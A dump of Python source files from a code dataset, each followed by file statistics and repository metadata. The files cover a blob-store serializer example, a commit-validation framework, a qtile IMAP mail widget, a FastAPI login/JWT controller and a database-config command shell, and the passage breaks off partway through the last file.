                shutil.copyfile(path + fname, "emoji/all/" + fname)
            except Exception as e:
                print(e)


if __name__ == '__main__':
    main()
| 37.440476
| 151
| 0.574245
| 418
| 3,145
| 4.289474
| 0.373206
| 0.020078
| 0.047407
| 0.050195
| 0.139431
| 0.070273
| 0
| 0
| 0
| 0
| 0
| 0.001403
| 0.320191
| 3,145
| 83
| 152
| 37.891566
| 0.837231
| 0.294118
| 0
| 0.430556
| 0
| 0
| 0.114299
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0.111111
| 0.069444
| 0
| 0.125
| 0.138889
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
b9a767c55418efb8b98d12205d59e512ca419081
| 1,860
|
py
|
Python
|
blobStore.py
|
odeke-em/resty
|
838934033e7eeca521e8c6d8cb2e99778beaa4b9
|
[
"Apache-2.0"
] | null | null | null |
blobStore.py
|
odeke-em/resty
|
838934033e7eeca521e8c6d8cb2e99778beaa4b9
|
[
"Apache-2.0"
] | null | null | null |
blobStore.py
|
odeke-em/resty
|
838934033e7eeca521e8c6d8cb2e99778beaa4b9
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# Author: Emmanuel Odeke <odeke@ualberta.ca>
# This example steps you through using resty & restAssured to save pickled/serialized
# data as a blob and then later re-using it in after deserialization.
# Sample usage might be in collaborative computing ie publish results from an expensive
# computation on one machine so that other machines can load it as live data.
def testSerializer():
    """Round-trip a small dict through the binary and JSON serializers and
    exercise the ioStream helper."""
    import Serializer
    bs = Serializer.BinarySerializer()
    js = Serializer.JSONSerializer()
    data = dict((i, i) for i in range(10))
    bserial = bs.serialize(data)
    jserial = js.serialize(data)
    bdserial = bs.deserialize(bserial)
    jdserial = js.deserialize(jserial)
    print('bdserial', bdserial)
    ioS = bs.ioStream(bserial)
    ioR = ioS.read()
    print('ioS data from the stream', ioR)
def testCloudPassagePickledVersion():
    """Push a dict to CloudPassage as a pickle, pull it back, verify equality,
    then remove the trace."""
    from entrails.cloudPassage import CloudPassageHandler
    cc = CloudPassageHandler()
    data = dict((i, i * 10) for i in range(9))
    # NOTE(review): the title mentions items 0-8999 but the data only holds
    # keys 0-8 — confirm which was intended.
    title = 'Dict of items 0-8999, keys i*10'
    res = cc.push(data, title=title, asPickle=True)
    pulledObj = cc.pull(metaData='pickle')
    print('PulledObj', pulledObj, data)
    assert pulledObj == data
    rmTry = cc.removeTrace(data, asPickle=True)
    print(rmTry)
def testCloudPassageJSONVersion():
    """Push a dict to CloudPassage as JSON (string keys), pull it back,
    verify equality, then remove the trace."""
    from entrails.cloudPassage import CloudPassageHandler
    cc = CloudPassageHandler()
    data = dict((str(i), i * 10) for i in range(9))
    # NOTE(review): the title mentions items 0-8999 but the data only holds
    # keys '0'-'8' — confirm which was intended.
    title = 'Dict of items 0-8999, keys i*10'
    res = cc.push(data, title=title, asPickle=False)
    pulledObj = cc.pull(metaData='json')
    print('PulledObj', pulledObj, data)
    assert pulledObj == data
    rmTry = cc.removeTrace(data)
    print(rmTry)
def main():
    """Run all blob-store examples."""
    testSerializer()
    testCloudPassageJSONVersion()
    testCloudPassagePickledVersion()


if __name__ == '__main__':
    main()
| 31
| 87
| 0.7
| 234
| 1,860
| 5.529915
| 0.478632
| 0.009274
| 0.01391
| 0.025502
| 0.341577
| 0.341577
| 0.341577
| 0.341577
| 0.341577
| 0.22102
| 0
| 0.015323
| 0.193011
| 1,860
| 59
| 88
| 31.525424
| 0.846769
| 0.203226
| 0
| 0.292683
| 0
| 0
| 0.088076
| 0
| 0
| 0
| 0
| 0
| 0.04878
| 1
| 0.097561
| false
| 0.195122
| 0.073171
| 0
| 0.170732
| 0.146341
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
b9d992fc9c803eca7ba614c187b28cbfcef4b1f8
| 5,988
|
py
|
Python
|
scripts/commit_validation/commit_validation/commit_validation.py
|
cypherdotXd/o3de
|
bb90c4ddfe2d495e9c00ebf1e2650c6d603a5676
|
[
"Apache-2.0",
"MIT"
] | 8
|
2021-08-31T02:14:19.000Z
|
2021-12-28T19:20:59.000Z
|
scripts/commit_validation/commit_validation/commit_validation.py
|
cypherdotXd/o3de
|
bb90c4ddfe2d495e9c00ebf1e2650c6d603a5676
|
[
"Apache-2.0",
"MIT"
] | 8
|
2021-07-12T13:55:00.000Z
|
2021-10-04T14:53:21.000Z
|
scripts/commit_validation/commit_validation/commit_validation.py
|
cypherdotXd/o3de
|
bb90c4ddfe2d495e9c00ebf1e2650c6d603a5676
|
[
"Apache-2.0",
"MIT"
] | 1
|
2021-09-16T05:06:18.000Z
|
2021-09-16T05:06:18.000Z
|
#
# Copyright (c) Contributors to the Open 3D Engine Project.
# For complete copyright and license terms please see the LICENSE at the root of this distribution.
#
# SPDX-License-Identifier: Apache-2.0 OR MIT
#
#
import abc
import importlib
import os
import pkgutil
import re
import time
from typing import Dict, List, Tuple
VERBOSE = False
class Commit(abc.ABC):
    """An interface for accessing details about a commit"""

    @abc.abstractmethod
    def get_files(self) -> List[str]:
        """Returns a list of local files added/modified by the commit"""
        pass

    @abc.abstractmethod
    def get_removed_files(self) -> List[str]:
        """Returns a list of local files removed by the commit"""
        pass

    @abc.abstractmethod
    def get_file_diff(self, file_name: str) -> str:
        """
        Given a file name, returns a string in unified diff format
        that represents the changes made to that file for this commit.
        Most validators will only pay attention to added lines (with + in front)
        """
        # BUG FIX: the parameter was named `str`, shadowing the builtin and
        # leaving it unannotated.
        pass

    @abc.abstractmethod
    def get_description(self) -> str:
        """Returns the description of the commit"""
        pass

    @abc.abstractmethod
    def get_author(self) -> str:
        """Returns the author of the commit"""
        pass
def validate_commit(commit: Commit, out_errors: List[str] = None, ignore_validators: List[str] = None) -> bool:
    """Validates a commit against all validators

    :param commit: The commit to validate
    :param out_errors: if not None, will populate with the list of errors given by the validators
    :param ignore_validators: Optional list of CommitValidator classes to ignore, by class name
    :return: True if there are no validation errors, and False otherwise
    """
    failed_count = 0
    passed_count = 0
    start_time = time.time()

    # Find all the validators in the validators package (recursively)
    validator_classes = []
    validators_dir = os.path.join(os.path.dirname(__file__), 'validators')
    for _, module_name, is_package in pkgutil.iter_modules([validators_dir]):
        if not is_package:
            module = importlib.import_module('commit_validation.validators.' + module_name)
            validator = module.get_validator()
            if ignore_validators and validator.__name__ in ignore_validators:
                print(f"Disabled validation for '{validator.__name__}'")
            else:
                validator_classes.append(validator)

    error_summary = {}

    # Process validators
    for validator_class in validator_classes:
        validator = validator_class()
        validator_name = validator.__class__.__name__
        error_list = []
        passed = validator.run(commit, errors=error_list)
        if passed:
            passed_count += 1
            print(f'{validator_name} PASSED')
        else:
            failed_count += 1
            print(f'{validator_name} FAILED')
        error_summary[validator_name] = error_list
        # BUG FIX: out_errors was documented as being populated but the
        # original never wrote to it.
        if out_errors is not None:
            out_errors.extend(error_list)

    end_time = time.time()

    if failed_count:
        print("VALIDATION FAILURE SUMMARY")
        for val_name, errors in error_summary.items():
            for error_message in errors:
                first_line = True
                for line in error_message.splitlines():
                    if first_line:
                        first_line = False
                        print(f'VALIDATOR_FAILED: {val_name} {line}')
                    else:
                        print(f'  {line}')  # extra detail lines do not need machine parsing

    stats_strs = []
    if failed_count > 0:
        stats_strs.append(f'{failed_count} failed')
    if passed_count > 0:
        stats_strs.append(f'{passed_count} passed')
    stats_str = ', '.join(stats_strs) + f' in {end_time - start_time:.2f}s'
    print()
    print(stats_str)

    return failed_count == 0
def IsFileSkipped(file_name) -> bool:
    """Return True when a file is exempt from validation.

    A file is validated when its extension is one of
    SOURCE_AND_SCRIPT_FILE_EXTENSIONS, or when its name matches one of
    SOURCE_AND_SCRIPT_FILE_PATTERNS; every other file is skipped.
    """
    if os.path.splitext(file_name)[1].lower() in SOURCE_AND_SCRIPT_FILE_EXTENSIONS:
        return False
    # Not a recognized extension: skip unless a filename pattern matches.
    return not any(pattern.match(file_name) for pattern in SOURCE_AND_SCRIPT_FILE_PATTERNS)
class CommitValidator(abc.ABC):
    """A commit validator"""

    @abc.abstractmethod
    def run(self, commit: Commit, errors: List[str]) -> bool:
        """Validates a commit

        :param commit: The commit to validate
        :param errors: List of errors generated, append them to this list
        :return: True if the commit is valid, and False otherwise
        """
        pass
# Extension and filename-pattern tables consumed by IsFileSkipped() above.
SOURCE_FILE_EXTENSIONS: Tuple[str, ...] = (
    '.c', '.cc', '.cpp', '.cxx', '.h', '.hpp', '.hxx', '.inl', '.m', '.mm', '.cs', '.java'
)
"""File extensions for compiled source code"""

SCRIPT_FILE_EXTENSIONS: Tuple[str, ...] = (
    '.py', '.lua', '.bat', '.cmd', '.sh', '.js'
)
"""File extensions for interpreted code"""

BUILD_FILE_EXTENSIONS: Tuple[str, ...] = (
    '.cmake',
)
"""File extensions for build files"""

SOURCE_AND_SCRIPT_FILE_EXTENSIONS: Tuple[str, ...] = SOURCE_FILE_EXTENSIONS + SCRIPT_FILE_EXTENSIONS + BUILD_FILE_EXTENSIONS
"""File extensions for both compiled and interpreted code"""

BUILD_FILE_PATTERNS: Tuple[re.Pattern, ...] = (
    re.compile(r'.*CMakeLists\.txt'),
    re.compile(r'.*Jenkinsfile')
)
"""File patterns for build files"""

SOURCE_AND_SCRIPT_FILE_PATTERNS: Tuple[re.Pattern, ...] = BUILD_FILE_PATTERNS

# Glob-style paths excluded from validation entirely.
EXCLUDED_VALIDATION_PATTERNS = [
    '*/.git/*',
    '*/3rdParty/*',
    '*/__pycache__/*',
    '*/External/*',
    'build',
    'Cache',
    '*/Code/Framework/AzCore/azgnmx/azgnmx/*',
    'Code/Tools/CryFXC',
    'Code/Tools/HLSLCrossCompiler',
    'Code/Tools/HLSLCrossCompilerMETAL',
    'Docs',
    'python/runtime',
    'restricted/*/Tools/*RemoteControl',
    'Tools/3dsmax',
    '*/user/Cache/*',
    '*/user/log/*',
]
| 31.68254
| 124
| 0.631096
| 720
| 5,988
| 5.047222
| 0.3
| 0.04623
| 0.033021
| 0.031646
| 0.168134
| 0.118327
| 0.106219
| 0.042928
| 0.022014
| 0.022014
| 0
| 0.003149
| 0.257515
| 5,988
| 188
| 125
| 31.851064
| 0.814215
| 0.215932
| 0
| 0.125
| 0
| 0
| 0.15374
| 0.056325
| 0
| 0
| 0
| 0
| 0
| 1
| 0.066667
| false
| 0.108333
| 0.066667
| 0
| 0.175
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6a04d1fd425aed6effcc3e48e1eb103f0872ab5a
| 3,621
|
py
|
Python
|
libqtile/widget/imapwidget.py
|
akloster/qtile
|
bd21d0744e177b8ca01ac129081472577d53ed66
|
[
"MIT"
] | 1
|
2021-04-05T07:15:37.000Z
|
2021-04-05T07:15:37.000Z
|
libqtile/widget/imapwidget.py
|
akloster/qtile
|
bd21d0744e177b8ca01ac129081472577d53ed66
|
[
"MIT"
] | 1
|
2022-02-27T12:17:27.000Z
|
2022-02-27T12:17:27.000Z
|
libqtile/widget/imapwidget.py
|
akloster/qtile
|
bd21d0744e177b8ca01ac129081472577d53ed66
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2015 David R. Andersen
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import imaplib
import re
import keyring
from libqtile.log_utils import logger
from libqtile.widget import base
class ImapWidget(base.ThreadPoolText):
    """Email IMAP widget

    This widget will scan one of your imap email boxes and report the number of
    unseen messages present. I've configured it to only work with imap with
    ssl. Your password is obtained from the Gnome Keyring.

    Writing your password to the keyring initially is as simple as (changing
    out <userid> and <password> for your userid and password):

    1) create the file ~/.local/share/python_keyring/keyringrc.cfg with the
       following contents::

           [backend]
           default-keyring=keyring.backends.Gnome.Keyring
           keyring-path=/home/<userid>/.local/share/keyring/

    2) Execute the following python shell script once::

           #!/usr/bin/env python3
           import keyring
           user = <userid>
           password = <password>
           keyring.set_password('imapwidget', user, password)

    mbox names must include the path to the mbox (except for the default
    INBOX). So, for example if your mailroot is ``~/Maildir``, and you want to
    look at the mailbox at HomeMail/fred, the mbox setting would be:
    ``mbox="~/Maildir/HomeMail/fred"``. Note the nested sets of quotes! Labels
    can be whatever you choose, of course.

    Widget requirements: keyring_.

    .. _keyring: https://pypi.org/project/keyring/
    """

    defaults = [
        ('mbox', '"INBOX"', 'mailbox to fetch'),
        ('label', 'INBOX', 'label for display'),
        ('user', None, 'email username'),
        ('server', None, 'email server name'),
    ]

    def __init__(self, **config):
        base.ThreadPoolText.__init__(self, "", **config)
        self.add_defaults(ImapWidget.defaults)
        password = keyring.get_password('imapwidget', self.user)
        if password is not None:
            self.password = password
        else:
            logger.critical('Gnome Keyring Error')
            # BUG FIX: poll() compares self.password against this sentinel,
            # but the original never set the attribute on the failure path,
            # so poll() raised AttributeError instead of showing the error.
            self.password = 'Gnome Keyring Error'

    def poll(self):
        """Query the mailbox over IMAP4-SSL and return the widget text."""
        im = imaplib.IMAP4_SSL(self.server, 993)
        if self.password == 'Gnome Keyring Error':
            self.text = 'Gnome Keyring Error'
        else:
            im.login(self.user, self.password)
            status, response = im.status(self.mbox, '(UNSEEN)')
            self.text = response[0].decode()
            # Strip everything except the number after 'UNSEEN' in the reply.
            self.text = self.label + ': ' + re.sub(r'\).*$', '', re.sub(r'^.*N\s', '', self.text))
            im.logout()
        return self.text
| 38.521277
| 98
| 0.67219
| 485
| 3,621
| 4.985567
| 0.472165
| 0.036394
| 0.021092
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.004681
| 0.233085
| 3,621
| 93
| 99
| 38.935484
| 0.866042
| 0.631041
| 0
| 0.064516
| 0
| 0
| 0.150741
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0.16129
| 0.16129
| 0
| 0.322581
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6a186a13afeea2c9ca39fb78982684eb10c871db
| 3,784
|
py
|
Python
|
bench_fastapi/authentication/controllers/login.py
|
sharkguto/teste_carga
|
56d6e9dcbd3e7b7fe7295d8fcf4b4e8b84943cfb
|
[
"MIT"
] | 1
|
2021-10-14T07:27:47.000Z
|
2021-10-14T07:27:47.000Z
|
bench_fastapi/authentication/controllers/login.py
|
sharkguto/teste_carga
|
56d6e9dcbd3e7b7fe7295d8fcf4b4e8b84943cfb
|
[
"MIT"
] | 4
|
2019-08-06T02:26:32.000Z
|
2021-06-10T21:39:19.000Z
|
bench_fastapi/authentication/controllers/login.py
|
sharkguto/teste_carga
|
56d6e9dcbd3e7b7fe7295d8fcf4b4e8b84943cfb
|
[
"MIT"
] | 1
|
2018-05-11T18:04:41.000Z
|
2018-05-11T18:04:41.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# login.py
# @Author : Gustavo Freitas (gustavo@gmf-tech.com)
# @Link :
# @Date : 12/12/2019, 11:43:07 AM
from typing import Optional, Any
from fastapi import APIRouter, Body, Depends, HTTPException
from fastapi import Header, Security
from authentication.models.users import User
from fastapi.security import HTTPBasic, HTTPBasicCredentials, APIKeyHeader
from typing import List
from starlette.responses import Response
from fastapi.encoders import jsonable_encoder
from authentication.interfaces.database import database
import jwt
from starlette.status import HTTP_400_BAD_REQUEST, HTTP_401_UNAUTHORIZED
from datetime import datetime, timedelta
from hashlib import sha256
from authentication.interfaces.token import verify_token
# Shared router and authentication scheme objects for this module.
router = APIRouter()
security = HTTPBasic(auto_error=True)  # consumed via Security(security) in login_basic
# NOTE(review): api_key is not referenced anywhere in this file's visible code
# — confirm it is used elsewhere before removing.
api_key = APIKeyHeader(name="x-api-key", auto_error=True)
@router.post("/login", tags=["token"])
async def renew_token(
    response: Response,
    user: dict = Depends(verify_token),
    x_api_key: str = Header(None),
):
    """Confirm the caller's token is valid and echo the x-api-key header back.

    NOTE(review): a second function also named `renew_token` is defined for
    PUT /login below; FastAPI registers both routes, but the later definition
    shadows this one at module level — consider distinct names.
    """
    response.headers["x-api-key"] = x_api_key
    return {"verified": True, "user": user["email"]}
@router.put("/login", tags=["token"])
async def renew_token(response: Response, user: dict = Depends(verify_token)):
    """Rotate the caller's stored token and return a fresh JWT in x-api-key."""
    sql = """UPDATE users.tbl_users
    SET token = :token WHERE
    id = :id"""
    # Token seed: password-change timestamp + email + current time, SHA-256'd.
    token = f"{user['pwd_updated_at']}-{user['email']}-{datetime.now()}"
    mhash = sha256(token.encode("utf-8"))
    token = mhash.hexdigest()
    await database.execute(query=sql, values={"id": user["id"], "token": token})
    # Sign an 8-hour JWT with the freshly stored token as the secret.
    response.headers["x-api-key"] = jwt.encode(
        {**user, **dict(exp=(datetime.now() + timedelta(hours=8)))},
        token,
        algorithm="HS256",
    ).decode()
    return {"renew": True}
# @router.post("/login", dependencies=[Depends(verify_token)])
# async def renew_token(x_api_key: str = Header(None)):
# return {"ok": x_api_key}
@router.get(
    "/login", response_model=User, tags=["auth"], response_model_exclude_unset=True
)
async def login_basic(
    response: Response, authorization: HTTPBasicCredentials = Security(security)
):
    """Authenticate with HTTP Basic credentials.

    On success: loads the user row and its ACL profiles, rotates the stored
    token, sets a fresh 8-hour JWT in the x-api-key response header, and
    returns the user record.

    :raises HTTPException: 401 when the credentials or profiles don't match.
    """
    sql = """SELECT tu.id, tu.email, tu."name", tu.linkedin_id , tu.pwd_updated_at
    FROM users.tbl_users tu
    WHERE tu.passwd is NOT NULL
    AND tu.passwd = crypt(:secret,tu.passwd)
    AND tu.email = :email
    AND tu.enabled = true """
    users = await database.fetch_one(
        query=sql,
        values={"email": authorization.username, "secret": authorization.password},
    )
    if not users:
        raise HTTPException(status_code=HTTP_401_UNAUTHORIZED)
    user = jsonable_encoder(users)

    sql = """SELECT tp.acl_profile as profile
    FROM users.tbl_users tu inner join
    users.tbl_profile_users tpu on tpu.id_users = tu.id inner join
    users.tbl_profile tp on tp.id = tpu.id_profile
    WHERE tu.passwd is NOT NULL
    AND tu.passwd = crypt(:secret,tu.passwd)
    AND tu.email = :email"""
    profiles = await database.fetch_all(
        query=sql,
        values={"email": authorization.username, "secret": authorization.password},
    )
    if not profiles:
        raise HTTPException(status_code=HTTP_401_UNAUTHORIZED)
    user["acl"] = jsonable_encoder(profiles)

    sql = """UPDATE users.tbl_users
    SET token = :token WHERE
    id = :id"""
    token = f"{user['pwd_updated_at']}-{authorization.username}-{datetime.now()}"
    mhash = sha256(token.encode("utf-8"))
    token = mhash.hexdigest()
    await database.execute(query=sql, values={"id": user["id"], "token": token})
    response.headers["x-api-key"] = jwt.encode(
        {**user, **dict(exp=(datetime.now() + timedelta(hours=8)))},
        token,
        algorithm="HS256",
    ).decode()
    return user
| 29.795276
| 83
| 0.681818
| 496
| 3,784
| 5.08871
| 0.294355
| 0.021395
| 0.022187
| 0.021395
| 0.493265
| 0.443344
| 0.443344
| 0.425515
| 0.385103
| 0.385103
| 0
| 0.014815
| 0.17944
| 3,784
| 126
| 84
| 30.031746
| 0.798068
| 0.075846
| 0
| 0.395349
| 0
| 0
| 0.267355
| 0.055651
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.069767
| 0.162791
| 0
| 0.197674
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
6a1f7efcf406b9bcc9bc35cc271b47eed9db309f
| 7,998
|
py
|
Python
|
mod_core.py
|
nokia-wroclaw/innovativeproject-dbshepherd
|
f82f3b36caaf9fcd6d28076051cb92458ba2edd3
|
[
"MIT"
] | null | null | null |
mod_core.py
|
nokia-wroclaw/innovativeproject-dbshepherd
|
f82f3b36caaf9fcd6d28076051cb92458ba2edd3
|
[
"MIT"
] | null | null | null |
mod_core.py
|
nokia-wroclaw/innovativeproject-dbshepherd
|
f82f3b36caaf9fcd6d28076051cb92458ba2edd3
|
[
"MIT"
] | 1
|
2020-02-05T20:02:15.000Z
|
2020-02-05T20:02:15.000Z
|
import re
import os
import cmd
import sys
import common
from getpass import getpass
from kp import KeePassError, get_password
from configmanager import ConfigManager, ConfigManagerError
# NOTE(review): presumably initializes shared module state used by the shell
# (the `common` module also provides get_cdir/chdir below) — confirm in common.py.
common.init()
class ParseArgsException(Exception):
    """Raised when a command line contains the wrong number of arguments."""

    def __init__(self, msg):
        # BUG FIX: call Exception.__init__ so str(e) and e.args carry the
        # message (the original left them empty).
        super().__init__(msg)
        self.msg = msg
class ModuleCore(cmd.Cmd):
def __init__(self, module=''):
    """Set up the interactive shell.

    :param module: label shown in the prompt; '#' selects the admin-style
                   prompt '#>', '' the plain '->', anything else '[module]>'.
    """
    cmd.Cmd.__init__(self)
    self.master = None  # KeePass master password, set later via do_setMaster
    if module == '#':
        self.prompt_sign = '#>'
    elif module != '':
        self.prompt_sign = '[' + module + ']>'
    else:
        self.prompt_sign = '->'
    # defaults
    self.ruler = '-'
    # Completions: pre-compute "file", "file.server" and "file.server.db"
    # names from every config file for tab-completion.
    self.directories = []
    self.file_server_database = []
    self.file_server = []
    self.do_cd('.')
    configs = ConfigManager().get_config_list()
    for conf in configs:
        self.file_server_database.append(conf)
        self.file_server.append(conf)
        for srv in ConfigManager('config/' + conf + '.yaml').get_all():
            self.file_server_database.append(conf + '.' + srv)
            self.file_server.append(conf + '.' + srv)
            for db in ConfigManager('config/' + conf + '.yaml').get(srv)['databases']:
                self.file_server_database.append(conf + '.' + srv + '.' + db)
def precmd(self, line):
    """Echo the command when input is piped (non-interactive) so transcripts
    show what was executed; the line itself is passed through unchanged."""
    if not sys.stdin.isatty():
        print(line)
    return line
def postcmd(self, stop, line):
    """After each command, print a blank separator line when input is piped;
    the stop flag is passed through unchanged."""
    if not sys.stdin.isatty():
        print("")
    return stop
def parse_args(self, string="", n=0, m=0):
    """Tokenize *string* (double-quoted runs kept whole) and check the count.

    :param n: minimum number of arguments; 0 disables all checking
    :param m: maximum number of arguments; 0 means "exactly n"
    :return: (list of arguments with quotes stripped, argument count)
    :raises ParseArgsException: when the count is outside the allowed range
    """
    tokens = re.findall('"+.*"+|[a-zA-Z0-9!@#$%^&*()_+-,./<>?]+', string)
    arg_counter = len(tokens)
    if (n <= arg_counter <= m) or (arg_counter == n and m == 0) or n == 0:
        return ([t.replace('"', '') for t in tokens], arg_counter)
    raise ParseArgsException("Incorrect number of arguments")
# Executes the given callback on databases selected by `values`.
def exec_on_config(self, callback, args, values, view=''):  # values: file.server.database
    """Run callback(file, server, db, *args) on every matching database.

    :param callback: callable invoked per database
    :param args: extra positional arguments forwarded to the callback
    :param values: '' = all config files (asks for confirmation), or a dotted
                   selector 'file', 'file.server' or 'file.server.database'
    :param view: '' (silent), 'tree' or 'list' progress display
    """
    if values == '':  # run on every configuration file
        files = ConfigManager().get_config_list()
        # Show what we are about to operate on and ask for confirmation.
        print("Exec on:")
        for file in files:
            print('+-', file)
        ans = input("Are you sure? [NO/yes/info]: ")
        if ans == "yes":  # run the callback everywhere
            for file in files:
                if view == 'tree':
                    print('+-', file)
                try:
                    servers = ConfigManager("config/" + file + ".yaml").get_all()
                    for srv in servers:
                        if view == 'tree':
                            print("| +-", srv)
                        databases = servers[srv]["databases"]
                        for db in databases:
                            if view == 'tree':
                                print("| | +-", db)
                            if view == 'list':
                                print('[', file, '->', srv, '->', db, ']')
                            callback(file, srv, db, *args)
                except ConfigManagerError as e:
                    print(e)
        elif ans == "info":  # only show what the callback would run on
            for file in files:
                print('+-', file)
                servers = ConfigManager("config/" + file + ".yaml").get_all()
                for srv in servers:
                    print('| +-', srv)
                    databases = servers[srv]["databases"]
                    for db in databases:
                        print('| | +-', db)
        else:  # anything else aborts
            print("aborted")
    else:  # a specific target was requested
        val = values.split('.')  # split file_name.server.database
        params = len(val)
        if params == 1:  # file only: run on all its servers and databases
            file = val[0]
            try:
                servers = ConfigManager("config/" + file + ".yaml").get_all()
                for srv in servers:
                    if view == 'tree':
                        print("+-", srv)
                    databases = servers[srv]["databases"]
                    for db in databases:
                        if view == 'tree':
                            print("| +-", db)
                        if view == 'list':
                            print('[', srv, '->', db, ']')
                        callback(file, srv, db, *args)
            except ConfigManagerError as e:
                print(e)
            except KeyError as e:
                print(e, "is not exist")
        elif params == 2:  # file and server: run on all databases of that server
            file = val[0]
            try:
                servers = ConfigManager("config/" + file + ".yaml").get_all()
                srv = val[1]
                databases = servers[srv]["databases"]
                for db in databases:
                    if view == 'tree':
                        print("+-", db)
                    if view == 'list':
                        print('[', db, ']')
                    callback(file, srv, db, *args)
            except ConfigManagerError as e:
                print(e)
            except KeyError as e:
                print(e, "is not exist")
        elif params == 3:  # fully qualified: run on exactly that database
            try:
                callback(val[0], val[1], val[2], *args)
            except ConfigManagerError as e:
                print(e)
            except KeyError as e:
                print(e, "is not exist")
# zwraca skróconą ścieżkę do aktualnego katalogu - funkcja pomocnicza
def get_shortpath(self):
    """Return an abbreviated form of the current working directory.

    Keeps the first and last path components and replaces everything in
    between with '...'; detects whether the path uses backslash or
    forward-slash separators.
    """
    full = common.get_cdir()
    sep = '\\' if '\\' in full else '/'
    first = full.find(sep)
    # Ignore a trailing separator when looking for the last one.
    last = full.rfind(sep, 0, len(full) - 1)
    if first < last:
        return full[:first + 1] + '...' + full[last:]
    return full
# autouzupełnienia dla cmd polecenia cd
def complete_cd(self, text, line, begidx, endidx):
    """Tab-completion for `cd`: offer cached subdirectory names."""
    if text:
        return [entry for entry in self.directories if entry.startswith(text)]
    # No prefix typed yet: offer every known subdirectory (as a copy).
    return list(self.directories)
# polecenie cd - pozwala na przemieszczanie się po katalogach
def do_cd(self, args):
    "Move to directory"
    if args == '':
        # No argument: just show where we currently are.
        print(common.get_cdir())
    else:
        try:
            common.chdir(args)
            # Refresh the prompt to reflect the new location.
            self.prompt = self.get_shortpath() + ' ' + self.prompt_sign
            # Re-cache subdirectory names for `cd` tab-completion;
            # fetch the new cwd once instead of on every iteration.
            cwd = common.get_cdir()
            self.directories = [
                name for name in os.listdir(cwd)
                if os.path.isdir(os.path.join(cwd, name))
            ]
        except FileNotFoundError as e:
            print(e)
# wyświetla wszystkie pliki w lokalizacji
def do_ls(self, args):
    "List directory"
    # Print one entry per line; an empty directory prints nothing.
    for entry in os.listdir(common.get_cdir()):
        print(entry)
# podaje pełną ścieżkę aktualnego katalogu
def do_pwd(self, args):
    "Print path"
    # Full (unabbreviated) current working directory, via the shared helper.
    print(common.get_cdir())
# pozwala na decyzję czy chcemy wyświetlać warningi
def do_warn(self, args):
    """warn <on/off>"""
    try:
        (values, values_num) = self.parse_args(args, 0, 1)
        if values_num == 1:
            # Explicit argument: switch warnings on or off.
            if values[0] == 'on':
                print('Warnings on')
                self.warn = True
            elif values[0] == 'off':
                print('Warnings off')
                self.warn = False
            else:
                print('Incorrect argument.')
        else:
            # No argument: report the current state.
            print('Status: on' if self.warn else 'Status: off')
    except ParseArgsException as e:
        print(e)
# ustawia masterpassword dla keepasa
def do_setMaster(self, args):
    "Set master password"
    # Interactive shell: prompt without echoing.
    # Piped/non-tty input: read one line instead.
    if sys.stdin.isatty():
        secret = getpass('Enter Master Password: ')
    else:
        secret = sys.stdin.readline().rstrip()
    self.master = secret
def do_exit(self, *args):
    """Terminate the command loop."""
    return True
def do_EOF(self, line):
    """Exit the command loop on end-of-file (Ctrl-D)."""
    return True
def emptyline(self):
    """Do nothing on an empty input line (do not repeat the last command)."""
    return False
# Musimy wyłapać wszystko co możliwe, nie ma pliku, zly master itp. i zwrocic 1 wyjątek
def get_password(self, alias):
    """Look up *alias* in the KeePass database.

    Raises KeePassError when no master password has been set, or when the
